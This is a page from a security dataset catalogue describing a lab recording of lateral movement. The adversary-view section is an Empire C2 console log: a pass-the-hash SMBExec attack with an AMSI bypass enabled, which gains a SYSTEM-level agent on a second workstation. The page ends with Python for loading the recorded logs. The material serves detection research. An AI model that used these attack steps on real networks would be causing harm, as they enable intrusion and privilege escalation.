Empire Invoke SMBExec
Contents
Empire Invoke SMBExec#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/20 |
Tactics |
|
Techniques |
|
Tags |
RPC CreateService,RPC StartService,SMB Svcctl |
Dataset Description#
This dataset represents adversaries remotely creating and starting a service via RPC methods over SMB named pipes such as svcctl.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: 7ADX8ZVR) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
7ADX8ZVR ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 8948 5/0.0 2020-09-20 06:34:21 http
(Empire: agents) > interact 7ADX8ZVR
(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8
(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo
(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire
(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local
(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: powershell/lateral_movement/invoke_smbexec) > info
Name: Invoke-SMBExec
Module: powershell/lateral_movement/invoke_smbexec
NeedsAdmin: False
OpsecSafe: True
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@rvrsh3ll
Description:
Executes a stager on remote hosts using SMBExec.ps1. This
module requires a username and NTLM hash
Comments:
https://raw.githubusercontent.com/Kevin-Robertson/Invoke-
TheHash/master/Invoke-SMBExec.ps1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 7ADX8ZVR Agent to run module on.
CredID False CredID from the store to use.
ComputerName True WORKSTATION6.theshire.lo Host[s] to execute the stager on, comma
cal separated.
Username True pgustavo Username.
Domain False theshire Domain.
Hash True 81d310fa34e6a56a31145445 NTLM Hash in LM:NTLM or NTLM format.
891bb7b8
Service False Name of service to create and delete.
Defaults to 20 char random.
Listener False http Listener to use.
Command False Custom command to run.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
AMSIBypass False True Include mattifestation's AMSI Bypass in
the stager code.
AMSIBypass2 False False Include Tal Liberman's AMSI Bypass in
the stager code.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/lateral_movement/invoke_smbexec) > execute
[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT
[*] Agent 7ADX8ZVR tasked with task ID 3
[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec
(Empire: powershell/lateral_movement/invoke_smbexec) >
Command executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6
[*] New agent 3KL8YRUB checked in
[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)
[*] Sending agent (stage 2) to 3KL8YRUB at 172.18.39.6
(Empire: powershell/lateral_movement/invoke_smbexec) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
A7BWPR32 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5904 5/0.0 2020-09-18 18:29:36 http
HBEW9G1D ps 172.18.39.6 WORKSTATION6 THESHIRE\sbeavers powershell 6036 5/0.0 2020-09-18 18:15:39 http
7ADX8ZVR ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 8948 5/0.0 2020-09-20 06:57:53 http
3KL8YRUB ps 172.18.39.6 WORKSTATION6 *THESHIRE\SYSTEM powershell 1152 5/0.0 2020-09-20 06:57:49 http
(Empire: agents) > interact 3KL8YRUB
(Empire: 3KL8YRUB) > shell whoami
[*] Tasked 3KL8YRUB to run TASK_SHELL
[*] Agent 3KL8YRUB tasked with task ID 1
(Empire: 3KL8YRUB) >
nt authority\system
..Command execution completed.
(Empire: 3KL8YRUB) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)